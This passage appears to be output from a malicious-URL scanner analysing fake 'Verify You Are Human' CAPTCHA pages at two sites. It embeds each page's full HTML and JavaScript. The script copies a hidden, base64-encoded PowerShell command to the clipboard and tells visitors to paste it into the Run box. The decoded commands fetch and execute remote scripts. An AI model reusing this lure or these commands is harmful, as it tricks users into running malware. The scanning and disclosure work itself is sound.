8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.thesignaturemag.salviatech.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.test.peperoncinochepassione.it/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.test.peperoncinochepassione.it/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=",
"Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r",
"ClipboardCommands": "PowErsHeLL -W hiddEn ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n 